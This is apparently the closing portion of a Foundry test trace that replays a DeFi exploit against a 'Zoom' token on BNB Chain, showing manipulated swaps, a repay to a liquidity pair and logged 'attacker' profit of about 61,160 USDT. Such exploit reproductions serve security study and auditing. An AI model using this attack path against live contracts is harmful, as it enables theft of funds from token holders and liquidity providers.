    │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 0x00000000000000000000000000000000000000055b404c92ac688478599e44b1 → 0x00000000000000000000000000000000000000054d89e5683f2a0843f252721f
    │   │   │   │   │   @ 0x4484d23546fbd11fe561d9424331f3302375688b0ce3529a7d925c8ed4d9153f: 0x00000000000000000000000000000000000000000fd999d84e406173e0cd6901 → 0x00000000000000000000000000000000000000001d900102bb7edda848193b93
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [6595] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transfer(0xe033B596b78856F76dDA12a28a51BF1527DB25B1, 2546290087938120501408136792 [2.546e27])
    │   │   │   │   ├─ [706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0xe033B596b78856F76dDA12a28a51BF1527DB25B1)
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: 0xe033B596b78856F76dDA12a28a51BF1527DB25B1, value: 2546290087938120501408136792 [2.546e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 0x00000000000000000000000000000000000000054d89e5683f2a0843f252721f → 0x0000000000000000000000000000000000000005454fa781fd9e24248124f3c7
    │   │   │   │   │   @ 0x8578d50ff70c54223dcad776709a5b0daa7a376868b288a8d1c9b7855780589c: 0x0000000000000000000000000000000000000000bced817a4ac357360a5f0c21 → 0x0000000000000000000000000000000000000000c527bf608c4f3b557b8c8a79
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [94684] 0x95d6c685979667AD7864809f29FE356F97D98A1D::swapExactTokensForTokens(417591574421851762230934433898 [4.175e29], 0, [0x9CE084C378B3E65A164aeba12015ef3881E0F853, 0x62D51AACb079e882b1cb7877438de485Cba0dD3f, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1662348485 [1.662e9])
    │   │   │   │   ├─ [540] 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 19198754777163623656927698 [1.919e25], 2189362840297458758244002644819 [2.189e30], 1662348485 [1.662e9]
    │   │   │   │   ├─ [343] 0x95d6c685979667AD7864809f29FE356F97D98A1D::swapRate() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000000000003e6
    │   │   │   │   ├─ [17921] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::transferFrom(0x5a9846062524631C01ec11684539623DAb1Fae58, 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, 417591574421851762230934433898 [4.175e29])
    │   │   │   │   │   ├─ [2706] 0xA92a3e24A9f5C364Af9E27a9af4A96FcC2388ab0::father(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5)
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─ emit Transfer(from: 0x5a9846062524631C01ec11684539623DAb1Fae58, to: 0xEc6557348085Aa57C72514D67070dC863C0a5A8c, value: 417591574421851762230934433898 [4.175e29])
    │   │   │   │   │   ├─ emit Approval(owner: 0x5a9846062524631C01ec11684539623DAb1Fae58, spender: 0x95d6c685979667AD7864809f29FE356F97D98A1D, value: 115792089237316195423570985008687907853269984658577928952838896603277837659457 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4e55f09f509bb072e1b3821235e78f8846e50eb9cad4132d5ddd6e47647a01f3: 0x000000000000000000000000000000000000001ba2367ece7a1a4eb25d934353 → 0x0000000000000000000000000000000000000020e786265077b872d6deb833bd
    │   │   │   │   │   │   @ 0x069b10d02348461ffdc800421cfcf78167a3d612823682764e66216432d7ebd9: 0x0000000000000000000000000000000000000005454fa781fd9e24248124f3c7 → 861
    │   │   │   │   │   │   @ 0xa2e5940b11b2e04fc4b2db8160c33579503523e0d9320cea9cf78943e8661836: 0xffffffffffffffffffffffffffffffffffffffac20b4d64ec632ad83a573ddab → 0xffffffffffffffffffffffffffffffffffffffa6db652eccc894895f244eed41
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [21470] 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5::swap(3070160283128930726498344 [3.07e24], 0, 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, 0x, false)
    │   │   │   │   │   ├─ [4575] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::transfer(0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, 3070160283128930726498344 [3.07e24])
    │   │   │   │   │   │   ├─ emit MyTransfer(param0: 0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5, param1: 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, param2: 3070160283128930726498344 [3.07e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xf779689b4bc479978c2f4dd4f88ba4b7fff69ad5d720ca4f33b286687dae4018: 0x0000000000000000000000000000000000000000000fe17e94f8c402dfb531d2 → 0x0000000000000000000000000000000000000000000d575cdc06c89350de61aa
    │   │   │   │   │   │   │   @ 0xed14edce0f9ade760a2fdbfb5a12a536b98c1c3509ffbe6e28d76b16f79b402a: 0x00000000000000000000000000000000000000000005cd7cb311c2a833b16be3 → 0x00000000000000000000000000000000000000000008579e6c03be17c2883c0b
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 16128594494034692930429354 [1.612e25]
    │   │   │   │   │   ├─ [1072] 0x9CE084C378B3E65A164aeba12015ef3881E0F853::balanceOf(0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2606954414719310520474937078717 [2.606e30]
    │   │   │   │   │   ├─ emit Swap2PK(: 16128594494034692930429354000 [1.612e28], : 2606119231570466816950475209849204 [2.606e33], : 19198754777163623656927698 [1.919e25], : 2189362840297458758244002644819 [2.189e30])
    │   │   │   │   │   ├─ emit Sync(reserve0: 16128594494034692930429354 [1.612e25], reserve1: 2606954414719310520474937078717 [2.606e30])
    │   │   │   │   │   ├─ emit Swap(sender: 0x95d6c685979667AD7864809f29FE356F97D98A1D, amount0In: 0, amount1In: 417591574421851762230934433898 [4.175e29], amount0Out: 3070160283128930726498344 [3.07e24], amount1Out: 0, to: 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 9: 0x63156cc5001ba2367ece7a1a4eb25d9343530000000fe17e94f8c402dfb531d2 → 0x63156cc50020e786265077b872d6deb833bd0000000d575cdc06c89350de61aa
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [39074] 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208::swap(3070160283128930726498344 [3.07e24], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x, true)
    │   │   │   │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3070160283128930726498344 [3.07e24])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3070160283128930726498344 [3.07e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000028a21b8f1fb6f8ed6d028
    │   │   │   │   │   │   │   @ 0x4a5595ad819661edca1e3c925371eeab0e74e8f79b3c77a8b71fa87113b7e747: 0x000000000000000000000000000000000000000000028d45818b8d525b96941d → 0x000000000000000000000000000000000000000000000323c89991e2ccbfc3f5
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 14827190236071076021237 [1.482e22]
    │   │   │   │   │   ├─ [1022] 0x62D51AACb079e882b1cb7877438de485Cba0dD3f::balanceOf(0xf72Fd2A9cDF1DB6d000A6181655e0F072fc47208) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 10085174809763928923978763 [1.008e25]
    │   │   │   │   │   ├─ emit Swap2PK(: 14827190236071076021237000 [1.482e25], : 10079034489197671062525766312 [1.007e28], : 3084987473365001802519581 [3.084e24], : 7015014526634998197480419 [7.015e24])
    │   │   │   │   │   ├─ emit Sync(reserve0: 14827190236071076021237 [1.482e22], reserve1: 10085174809763928923978763 [1.008e25])
    │   │   │   │   │   ├─ emit Swap(sender: 0x95d6c685979667AD7864809f29FE356F97D98A1D, amount0In: 0, amount1In: 3070160283128930726498344 [3.07e24], amount0Out: 3070160283128930726498344 [3.07e24], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 9: 0x63156cc500000005cd7cb311c2a833b16be3000000028d45818b8d525b96941d → 0x63156cc500000008579e6c03be17c2883c0b000000000323c89991e2ccbfc3f5
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 13: 0 → 1
    │   │   │   │   │   @ 0xa2e5940b11b2e04fc4b2db8160c33579503523e0d9320cea9cf78943e8661836: 0xffffffffffffffffffffffffffffffffffffffac20b4d64ec632ad83a573ddab → 0xffffffffffffffffffffffffffffffffffffffa6db652eccc894895f244eed41
    │   │   │   │   └─ ← [Return] [417591574421851762230934433898 [4.175e29], 3070160283128930726498344 [3.07e24], 3070160283128930726498344 [3.07e24]]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x72f1ac953a35c1d7fceb8ebbcc7cc42c7147e91c93d1bcbbf42878a8593909c8: 0x0000000000000000000000000000000000000217a51de94b58d3bf0301d18534 → 0x000000000000000000000000000000000000021249dd9cb8ac6b3a8aa83343df
    │   │   │   │   @ 0x8578d50ff70c54223dcad776709a5b0daa7a376868b288a8d1c9b7855780589c: 0x0000000000000000000000000000000000000000bced817a4ac357360a5f0c21 → 0x0000000000000000000000000000000000000000c527bf608c4f3b557b8c8a79
    │   │   │   │   @ 0x4484d23546fbd11fe561d9424331f3302375688b0ce3529a7d925c8ed4d9153f: 0x00000000000000000000000000000000000000000fd999d84e406173e0cd6901 → 0x00000000000000000000000000000000000000001d900102bb7edda848193b93
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3070160283128930726498344 [3.07e24]
    │   │   ├─ emit log_named_decimal_uint(key: "After selling Zoom, USDT balance of attacker:", val: 3070160283128930726498344 [3.07e24], decimals: 18)
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, 3009000000000000000000000 [3.009e24])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, value: 3009000000000000000000000 [3.009e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000004c89166da060017848833d → 0x0000000000000000000000000000000000000000004f0644a523e2bf2ee8833d
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000028a21b8f1fb6f8ed6d028 → 0x000000000000000000000000000000000000000000000cf3816e78b1d836d028
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 61160283128930726498344 [6.116e22]
    │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 61160283128930726498344 [6.116e22])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 61160283128930726498344 [6.116e22])
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xb15e5e2f7d52bbe7c425b83e6a597cd6f2009a881669b2b43b870e4ae8bb3a74: 0 → 0x000000000000000000000000000000004b3b4ca85a86c47a098a224000000000
    │   │   │   @ 13: 0 → 1
    │   │   │   @ 0x72f1ac953a35c1d7fceb8ebbcc7cc42c7147e91c93d1bcbbf42878a8593909c8: 0 → 0x0000000000000000000000000000000000000217a51de94b58d3bf0301d18534
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000004c89166da060017848833d → 0x0000000000000000000000000000000000000000004f0644a523e2bf2ee8833d
    │   │   │   @ 0xf779689b4bc479978c2f4dd4f88ba4b7fff69ad5d720ca4f33b286687dae4018: 0x0000000000000000000000000000000000000000000f0dbc7929f7153eb531d2 → 0x0000000000000000000000000000000000000000000fe17e94f8c402dfb531d2
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   └─ ← [Return] 95534740226653886119183165 [9.553e25]
    │   ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00) [staticcall]
    │   │   └─ ← [Return] 95286004125679778378748903 [9.528e25]
    │   ├─ emit Sync(reserve0: 95534740226653886119183165 [9.553e25], reserve1: 95286004125679778378748903 [9.528e25])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 3009000000000000000000000 [3.009e24], amount1In: 0, amount0Out: 3000000000000000000000000 [3e24], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x63156cc50000004ed198a24f8b23c50713e70000004f045cc10cc6ca5b48833d → 0x63156cc50000004ed198a24f8b23c50713e70000004f0644a523e2bf2ee8833d
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 61160283128930726498344 [6.116e22]
    ├─ emit log_named_decimal_uint(key: "[End] After repay, Profit: USDT balance of attacker", val: 61160283128930726498344 [6.116e22], decimals: 18)
    ├─  storage changes:
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.90s (1.46s CPU time)

Ran 2 test suites in 3.99s (3.58s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
